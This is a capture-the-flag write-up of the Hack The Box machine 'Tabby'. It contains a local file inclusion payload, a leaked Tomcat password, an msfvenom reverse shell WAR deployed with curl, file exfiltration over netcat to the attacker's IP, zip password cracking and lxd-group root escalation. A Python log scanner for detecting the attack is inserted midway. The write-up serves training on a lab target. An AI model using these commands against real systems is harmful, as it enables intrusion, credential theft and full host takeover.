
Tabby Writeup [HTB]

Tabby is a Linux machine from Hack The Box rated as easy. It consists of using a local file inclusion vulnerability to obtain the Tomcat host manager credentials and then uploading and deploying a WAR reverse shell. User pivoting is then possible thanks to password reuse, and membership of the lxd group can be abused to obtain a root shell.

Enumeration

Running nmap:

nmap -sC -sV 10.10.10.194
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-08 11:40 CEST
Nmap scan report for 10.10.10.194
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

On port 8080 Apache Tomcat is running. We try to log in to the manager with default credentials without luck, so let's look at port 80 to see if we can find them there.


Clicking the news button we are redirected to megahosting.htb, so we need to add it to our /etc/hosts:


The file parameter of news.php might be vulnerable to local file inclusion (LFI); we try /etc/passwd to confirm our suspicion:

http://megahosting.htb/news.php?file=../../../../../../../../../etc/passwd

And we can read the file:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash

As we have a local file inclusion vulnerability we can try to find the Tomcat config file that contains the manager credentials. Searching for that, I found this package list: https://packages.debian.org/sid/all/tomcat9/filelist

After trying some of these files I finally obtained the credentials by reading tomcat-users.xml:

http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>

With this set of credentials we can log in to the Tomcat host manager.

Exploitation

Looking for host manager exploits I came across this blog article.

Then I discovered there was also a Metasploit module, but we will perform the exploitation manually.

First we will create a WAR payload with msfvenom:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.21 LPORT=443 -f war > shell.war
Payload size: 1088 bytes
Final size of war file: 1088 bytes

Then we can upload and deploy it using the manager text API:

curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file shell.war "http://10.10.10.194:8080/manager/text/deploy?path=/shell.war"
OK - Deployed application at context path [/shell.war]

Finally we trigger the reverse shell by browsing to http://10.10.10.194:8080/shell.war

Checking netcat we obtain a connection as tomcat:

nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.194] 42130
whoami
tomcat
id
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)
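From the defender's side, the following Python script (an added example, not part of the original writeup) scans access-log lines for the two web-facing steps used above: traversal through the file parameter of news.php, including double-encoded variants, and a deployment through the manager text API. The combined log format, the constructed sample lines and the function names are assumptions.

```python
"""Flag the two web-facing steps of this chain in access-log lines:
traversal through news.php?file= and a deploy through /manager/text/deploy.
Added example, not from the original writeup; sample lines are constructed."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in combined log format (not real logs from the box).
SAMPLE_LOG = """\
10.10.14.21 - - [08/Sep/2020:11:45:01 +0200] "GET /news.php?file=statement HTTP/1.1" 200 1532
10.10.14.21 - - [08/Sep/2020:11:46:10 +0200] "GET /news.php?file=../../../../../../../../../etc/passwd HTTP/1.1" 200 2140
10.10.14.21 - - [08/Sep/2020:11:47:22 +0200] "GET /news.php?file=..%252f..%252fusr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1" 200 410
10.10.14.21 - tomcat [08/Sep/2020:11:50:03 +0200] "PUT /manager/text/deploy?path=/shell.war HTTP/1.1" 200 52
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding, so %252f (double-encoded '/') is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def analyze_line(line):
    """Return a finding for a suspicious request, or None for a benign one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m['target'])
    params = parse_qs(url.query)
    # 1. Traversal or absolute path passed to the include parameter.
    for raw in params.get('file', []):
        value = fully_decode(raw).replace('\\', '/')
        if '../' in value or value.startswith('/'):
            return f"LFI attempt from {m['ip']}: file={value}"
    # 2. Application deployment through the manager text API.
    if url.path.startswith('/manager/text/deploy'):
        target = params.get('path', ['?'])[0]
        return f"Tomcat deploy from {m['ip']} as {m['user']}: path={target}"
    return None

def scan(log_text):
    """Run analyze_line over every line and keep only the findings."""
    return [f for f in map(analyze_line, log_text.splitlines()) if f]
```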

This shell can be upgraded into a full interactive tty:

python -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
export TERM=xterm

As tomcat is a low-privileged user, we need to find some credentials to pivot to ash, the user previously discovered by reading /etc/passwd through the LFI.

Inside /var/www/html/files a zip file was discovered; as nc is installed on the machine we can use it to transfer the file to our local machine. On the local machine:

nc -lvnp 4444 > file.zip

On the victim machine:

nc 10.10.14.21 4444 < 16162020_backup.zip

When we try to unzip that file we are asked for a password:

unzip file.zip
Archive:  file.zip
   creating: var/www/html/assets/
[file.zip] var/www/html/favicon.ico password:

We can use zip2john and john to crack that password:

zip2john file.zip > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --show hash.txt
file.zip:admin@it

With the password admin@it we can unzip the file, but its contents turned out to be a rabbit hole.

As it was the only password we were able to find, I tried to use it to log in as ash, and it resulted in a successful login:

tomcat@tabby:~$ su ash
Password:
ash@tabby:/opt/tomcat$ whoami
ash

Privilege Escalation

Checking the output of the id command, we see that user ash is a member of the lxd group, which can be abused to obtain root.

ash@tabby:~$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

First we will download and build an Alpine image on the attacking machine:

git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
./build-alpine -a i686

Now the image can be transferred by setting up a Python HTTP server on the attacking machine:

python -m SimpleHTTPServer 80

On the victim machine:

ash@tabby:~/lxd$ wget http://10.10.14.21/alpine-v3.12-x86_64-20200908_0634.tar.gz
--2020-09-08 10:55:18--  http://10.10.14.21/alpine-v3.12-x86_64-20200908_0634.tar.gz
Connecting to 10.10.14.21:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3218990 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.12-x86_64-20200908_0634.tar.gz’

Initialising lxd:

ash@tabby:~/lxd$ lxd init

Then we need to import the image, create a privileged container from it and mount the host's root filesystem inside it at /mnt/root:

ash@tabby:~/lxd$ lxc image import ./alpine-v3.12-x86_64-20200908_0634.tar.gz --alias myimage
ash@tabby:~/lxd$ lxc init myimage mycontainer -c security.privileged=true
ash@tabby:~/lxd$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

Now we can start the container and execute a shell inside it:

ash@tabby:~/lxd$ lxc start mycontainer
ash@tabby:~/lxd$ lxc exec mycontainer /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # whoami
root

Finally, the host's filesystem is available under /mnt/root inside the container, where we can read the flag:

~ # cat /mnt/root/root/root.txt
a6af4f720c922eb39b0e0829ad159203

This post is licensed under CC BY 4.0 by the author.